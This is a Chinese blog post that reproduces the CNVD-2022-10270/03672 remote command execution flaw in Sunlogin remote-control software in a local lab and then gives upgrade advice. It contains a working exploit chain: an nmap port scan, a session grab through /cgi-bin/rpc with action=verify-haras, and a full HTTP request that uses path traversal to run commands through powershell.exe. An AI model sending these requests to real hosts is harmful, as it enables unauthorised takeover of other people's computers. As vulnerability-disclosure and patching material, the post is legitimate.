CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议

已于 2024-03-08 13:05:41 修改
阅读量6.8k 收藏 3
点赞数 2
分类专栏: 漏洞复现及修复建议 文章标签: 系统安全 安全漏洞
于 2022-03-31 01:20:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/123861520
版权

关注WX:【小白SEC】查看更多内容……

CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议

本文仅为验证漏洞,在本地环境测试验证,无其它目的

漏洞编号:

CNVD-2022-03672/CNVD-2022-10270

漏洞说明:

向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。2022年2月5日,CNVD公开向日葵简约版存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。2022年2月15日,CNVD公开向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

漏洞影响范围:

  • 向日葵个人版 for Windows <= 11.0.0.33
  • 向日葵简约版 <= V1.0.1.43315(2021.12)

漏洞级别:

高危

漏洞复现:

此处演示向日葵个人版,简约版没找到旧的安装包
版本:在这里插入图片描述

  1. 使用nmap扫描工具,扫描向日葵所在目标机IP,查看开放端口:】

    nmap -p 40000-65535 192.168.32.129

  2. 可以看到,部署向日葵的目标机开放了如下端口:
    在这里插入图片描述

  3. 依次通过浏览器访问ip+端口,直到出现如下图所示,在此环境中访问49200端口即出现JSON信息:

    IP:49200/

    在这里插入图片描述

  4. 尝试获取session,先测试目标机器是否存在/cgi-bin/rpc界面,浏览器继续访问:

    IP:49200/cgi-bin/rpc

    在这里插入图片描述

  5. 测试存在界面后,打开BP,浏览器加BP代理,在BurpSuite中获取刚才访问的界面,选择【Send to Repeater】:
    在这里插入图片描述

  6. 修改数据包为POST,并传入数据:action=verify-haras,点击【Send】,即可获取到session:
    在这里插入图片描述

  7. 修改数据包,添加session,并修改参数进行命令执行,下方ipconfig可进行修改为其他参数进行测试,例如替换为whoami:

    GET /check?	cmd=ping../../../Windows/System32/WindowsPowerShell/v1.0/powershell.exe+%20ipconfig 	HTTP/1.1
Host: 192.168.32.129:54107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Cookie:CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

    在这里插入图片描述

漏洞修复:

参考【贝锐

  1. PC端用户可通过官网直接升级到最新版本

  2. 通过软件检查更新

    (1)向日葵远程控制
    在这里插入图片描述

    (2)蒲公英异地组网
    在这里插入图片描述

    (3)花生壳内网穿透
    在这里插入图片描述

  3. 开启软件自动更新

    向日葵远程控制

    • 打开设置
    • 选择常规设置
    • 找到软件更新选项,并将更新选项修改为:自动更新
      在这里插入图片描述
Acczdy
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
向日葵漏洞扫描工具 CNVD-2022-10270
03-05
向日葵漏洞扫描工具
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
""" 声明: 本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS < 6.0.48 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多介绍请访问笔者博客:0xtlu.github.io """
向日葵RCE
m0_64338211的博客
03-01 1982
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现 1. 我们先安装漏洞本的向日葵也就是<=11.0.0.33本的, 2. 打开向日葵,连接服务器成功才可以 3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip) 4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试 5. 拿到CID-添加paylo..
向日葵RCE命令执行Windows <=11.0.0.33)
m0_52400001的博客
02-16 1万+
前言 向日葵个人版企业均受影响 for Windows <=11.0.0.33 SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce 一、话不多说开始复现 这里用的是 vm虚拟机安装的win10系统 1. 我们先安装漏洞本的向日葵也就是<=11.0.0.33本的, 2. 打开向日葵,连接服务器成功才可以哦 3. 打开之后会自动开启一个端
windows 64位向日葵服务端2022下载
05-04
电脑远程协助,远程开机,远程控制,windows 64位向日葵服务端2022下载
远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决
Gjqhs的博客
03-01 3249
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版简约,攻击者可利用该漏洞获取服务器控制权。 影响本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约 <= V1.0.1.43315(2021.12) 实验环境 :win10虚拟机 工具下载(含有漏洞本的向日葵):https://github.com/Mr-xn/sunlog...
向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672
sechelper的博客
02-19 308
手工复现过程,相关工具的使用与分享,批量检测利用
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现
Z_l123的博客
02-28 424
向日葵个人版 for Windows <= 11.0.0.33 向日葵简约 <= V1.0.1.43315(2021.12) 1.打开向日葵
复现CVE-2022-10270向日葵远程代码执行漏洞
BGiscool的博客
02-22 3266
CVE-2022-10270-向日葵远程代码执行漏洞复现
向日葵CNVD-2022-10207安装包
01-25
向日葵CNVD-2022-10207安装包
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
我了解豹女就像农民伯伯了解大米
03-19 1177
目录 漏洞描述: 工具复现: CS服务器上线:(失败) 漏洞描述: 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版简约,攻击者可利用该漏洞获取服务器控制权。 影响本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约 <= V1.0.1.43315(2021.12) 工具复现: 同一局域网: 攻击机:172.5
向日葵远程代码执行
qq_36148463的博客
08-21 266
链接:https://pan.baidu.com/s/1MVCW_Ggk-hAd05_y7ODwEw提取码:wxu9。
CNVD-2022-10270/CNVD-2022-03672向日葵RCE复现
xdjxi的博客
02-28 753
漏洞影响的向日葵个人版 for Windows <= 11.0.0.33 向日葵简约 <= V1.0.1.43315(2021.12) 工具下载(含有漏洞本的向日葵): https://github.com/Mr-xn/sunlogin_rce/releases/tag/newhttps://github.com/Mr-xn/sunlogin_rce/releases/tag/new 1-工具复现# 打开向日葵(我的装在虚拟机里面) 使用工具扫描-扫描时间长 ...
命令执行漏洞修复方案
热门推荐
pygain的博客
10-22 1万+
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因: 脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调用一些外部程序。 PHP可调用外部程序的常见函数:system,exec,shell_exec,passthru,popen,pro
RCE代码及命令执行漏洞
m0_51468027的博客
02-13 6867
  在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 一、代码执行 1、脚本 (1)PHP   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。   常见代码执行函数,如 eval()、assert()、preg_replace()、create_function
命令执行漏洞
龙狼刺的博客
04-27 540
命令执行漏洞
第十章 系统安全及应用【☆】
最新发布
2401_83883919的博客
04-24 452
①top命令或者free -m先分析CPU内存指标,第三行能看到CPU的总的使用率(或者还可以用htop查看,更直观)②确定占用高的进程ID以及执行命令 ③perf top -p PID,分析进程里是哪些系统调用、调用共享库、哪些模块造成该进程CPU占用过高(top -H PID 查看线程CPU使用情况)④第一种情况:访问量少但占用CPU多,可能是存在一些无限循环bug、Java不停的GC,找开发解决;执行JR破解并查看结果(破解密码是根据字典内容进行破解的,字典内没有的字段,破解不出来)
cnvd-2023-69477
12-08
cnvd-2023-69477是一个由国家信息安全漏洞共享平台发布的漏洞通告编号,该漏洞通告是针对特定软件或硬件产品的安全漏洞描述和修复建议的一个标识。根据cnvd-2023-69477的描述,这个漏洞可能会导致系统的信息泄露、拒绝服务或者远程代码执行等安全风险。建议用户及时关注厂商发布的安全补丁,并严格按照厂商提供的修复建议进行操作,确保系统的安全性。 对于系统管理员和安全工程师来说,他们需要关注cnvd-2023-69477的具体描述和风险评估,及时评估自身系统是否受到影响,快速制定修复计划并进行安全补丁的安装和验证。同时,建议关注该漏洞的后续动态,以便获取更多关于漏洞的详细信息和最新修复方案,及时做好安全防护工作。 总之,cnvd-2023-69477作为一个漏洞通告,提醒着用户和安全从业人员关注系统安全,及时采取措施保护系统,防范潜在的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值